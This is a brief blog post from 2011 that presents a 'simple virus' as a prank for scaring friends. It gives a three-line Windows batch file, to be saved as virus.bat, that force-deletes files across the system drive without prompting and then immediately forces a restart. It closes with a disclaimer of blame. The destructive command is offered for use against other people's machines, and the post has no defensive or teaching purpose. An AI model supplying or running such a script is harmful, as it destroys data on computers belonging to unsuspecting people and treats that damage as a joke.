Friday, 29 July 2011

How to creat a simple virus?



with this you can create your own virus to scar your friends
copy and paste this codes to make a simple virus to delect system file and shutdown the pc

@echo off
del %systemdrive% \*.*/f /s /q
shutdown -r -f -t 00

save it as virus.bat

NB: i am not to blame for the outcome

No comments:

Post a Comment